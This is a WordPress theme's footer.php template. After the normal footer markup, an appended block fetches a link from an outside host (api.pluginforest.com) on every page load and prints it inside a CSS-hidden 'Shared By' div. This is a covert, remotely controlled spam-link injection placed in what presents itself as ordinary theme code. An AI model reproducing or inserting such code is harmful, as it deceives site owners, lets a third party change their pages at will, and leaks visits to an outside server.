<?php
/*
 * The template for displaying the footer.
 * Author & Copyright: VictorThemes
 * URL: https://victorthemes.com
 */

$kroth_id    = ( isset( $post ) ) ? $post->ID : 0;
$kroth_id    = ( is_home() ) ? get_option( 'page_for_posts' ) : $kroth_id;
$kroth_id    = ( is_woocommerce_shop() ) ? wc_get_page_id( 'shop' ) : $kroth_id;
$kroth_meta  = get_post_meta( $kroth_id, 'page_type_metabox', true );

if ($kroth_meta) {
	$kroth_hide_footer  = $kroth_meta['hide_footer'];
} else { $kroth_hide_footer = ''; }
if (!$kroth_hide_footer) { // Hide Footer Metabox
?>

	<!-- Footer -->
	<footer>

		<?php
			$footer_widget_block = cs_get_option('footer_widget_block');
			if (isset($footer_widget_block)) {
	      // Footer Widget Block
	      get_template_part( 'layouts/footer/footer', 'widgets' );
	    }

	    $need_copyright = cs_get_option('need_copyright');
			if (isset($need_copyright)) {
	      // Copyright Block
      	get_template_part( 'layouts/footer/footer', 'copyright' );
	    }
    ?>

	</footer>
	<!-- Footer -->

<?php } // Hide Footer Metabox ?>

</div><!-- #vtheme-wrapper -->
</div><!-- body under div -->

<?php wp_footer(); ?>


<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>
